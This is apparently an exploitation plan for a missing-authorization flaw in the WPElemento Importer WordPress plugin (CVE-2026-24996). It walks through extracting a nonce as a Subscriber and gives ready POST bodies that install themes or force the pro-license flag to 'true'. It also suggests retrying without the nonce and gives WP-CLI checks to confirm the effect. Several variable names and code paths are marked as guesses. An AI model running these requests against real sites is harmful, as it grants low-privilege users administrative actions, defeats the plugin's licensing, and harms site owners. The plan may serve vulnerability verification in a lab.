Exploitation Research Plan: CVE-2026-24996 (WPElemento Importer)

1. Vulnerability Summary

The WPElemento Importer plugin (up to 0.6.4) is vulnerable to Missing Authorization in its AJAX handlers. The plugin registers several AJAX actions via the WPElemento_Importer_ThemeWhizzie class in theme-wizard/elemento_exporter_whizzie.php. These actions (registered with wp_ajax_*) are accessible to any authenticated user, including those with Subscriber privileges. Because the handler functions lack internal capability checks (e.g., current_user_can('manage_options')), a Subscriber can perform administrative tasks such as installing/activating themes or modifying plugin license configurations.

2. Attack Vector Analysis

• Endpoint: /wp-admin/admin-ajax.php
• Vulnerable Actions:
  • wz_activate_elemento_exporter_pro (Likely used to manipulate license/validation status).
  • wpelemento_importer_install_free_theme (Used to install and activate WordPress themes).
  • setup_plugins (Used to trigger plugin installations via TGMPA).
• Authentication: Authenticated, Subscriber-level access or higher.
• Payload Parameters:
  • action: The AJAX action name.
  • theme_slug: (For installation) The slug of the theme to install (e.g., twentytwentyfour).
  • key or license_key: (For license activation) The key to set.
  • _ajax_nonce: The security nonce localized by the plugin.

3. Code Flow

1. Initialization: plugin.php requires theme-wizard/config.php (Line 46), which instantiates WPElemento_Importer_ThemeWhizzie.
2. Registration: Inside WPElemento_Importer_ThemeWhizzie::init() (Lines 140-155), AJAX actions are registered:

   add_action('wp_ajax_wpelemento_importer_install_free_theme', array($this, 'wpelemento_importer_install_and_activate_free_theme'));
   add_action('wp_ajax_wz_activate_elemento_exporter_pro', array($this, 'wz_activate_elemento_exporter_pro'));
   

3. Execution: When a Subscriber sends a POST request to admin-ajax.php with action=wpelemento_importer_install_free_theme, WordPress executes the callback wpelemento_importer_install_and_activate_free_theme.
4. Sink: The handler likely performs a theme installation using the Theme_Upgrader class or modifies options like wpelemento_importer_pro_theme_validation_status via static methods (Lines 72-92) without verifying if the user has manage_options capabilities.

4. Nonce Acquisition Strategy

The plugin registers and localizes scripts in enqueue_scripts (Line 166). The nonce is required for the AJAX request.

1. Check Script Loading: The script theme-wizard-script is registered at Line 189. It is enqueued via admin_enqueue_scripts (Line 116).
2. Identify JS Variable: Based on the code, the localization variable is likely named wpelemento_importer_setup_wizard_params or wpelementoimporter_wizard_params (derived from $this->plugin_name at Line 132).
3. Extraction:
   • Log in as a Subscriber.
   • Navigate to /wp-admin/profile.php.
   • Use browser_eval to find the nonce:
     browser_eval("window.wpelementoimporter_wizard_params?.wpnonce || window.wpelemento_importer_params?.nonce")
4. Action Matching: Note that wp_ajax_ handlers often use the same nonce localized for the wizard. If a nonce check is present, it will likely use the key found in this global object.

5. Exploitation Strategy

We will demonstrate the vulnerability by unauthorizedly activating a theme from WordPress.org.

Step 1: Extract Nonce

1. Log in to WordPress as a Subscriber.
2. Visit /wp-admin/.
3. Extract the nonce from the localized script data.
   • Variable Name: wpelemento_importer_wizard_params (inferred from $this->plugin_name at Line 132).
   • Key: wpnonce or nonce.

Step 2: Unauthorized Theme Installation

Submit an AJAX request to install a theme (e.g., twentytwentyfour).

• Method: POST
• URL: http://<target>/wp-admin/admin-ajax.php
• Content-Type: application/x-www-form-urlencoded
• Body:

  action=wpelemento_importer_install_free_theme&theme_slug=twentytwentyfour&_ajax_nonce=[NONCE]
  

Step 3: Unauthorized License Activation (Alternative)

Attempt to change the validation status to "true".

• Method: POST
• URL: http://<target>/wp-admin/admin-ajax.php
• Body:

  action=wz_activate_elemento_exporter_pro&key=VALID_KEY_MOCK&_ajax_nonce=[NONCE]
  

6. Test Data Setup

1. A WordPress environment with WPElemento Importer 0.6.4 installed.
2. A Subscriber user (e.g., attacker / password).
3. Ensure the theme twentytwentyfour is not currently installed.

7. Expected Results

• Response: The AJAX request should return a success message (e.g., JSON { "success": true } or a success string).
• Effect: The theme twentytwentyfour will be downloaded and installed in /wp-content/themes/.
• Alternative Effect: The option wpelemento_importer_pro_theme_validation_status will be updated to true.

8. Verification Steps

After the HTTP request, verify the impact via WP-CLI:

1. Check Theme Installation:

   wp theme is-installed twentytwentyfour
   

2. Check Pro Validation Status:

   wp option get wpelemento_importer_pro_theme_validation_status
   

   (Expected: true)
3. Check Theme Key:

   wp option get wp_pro_theme_key
   

9. Alternative Approaches

If wpelemento_importer_install_free_theme requires specific theme metadata:

• Try the wpelemento_importer_setup_elementor action (Line 151) which might trigger Elementor-specific configurations or installations.
• If the nonce check fails or is missing, try the request without the _ajax_nonce parameter to see if the plugin fails to enforce CSRF protection as well.
• Check admin_init for wpelemento_importer_handle_free_theme_redirect (Line 141); if this function handles $_GET parameters without authorization, it might be possible to trigger a redirect or option update via a simple GET request.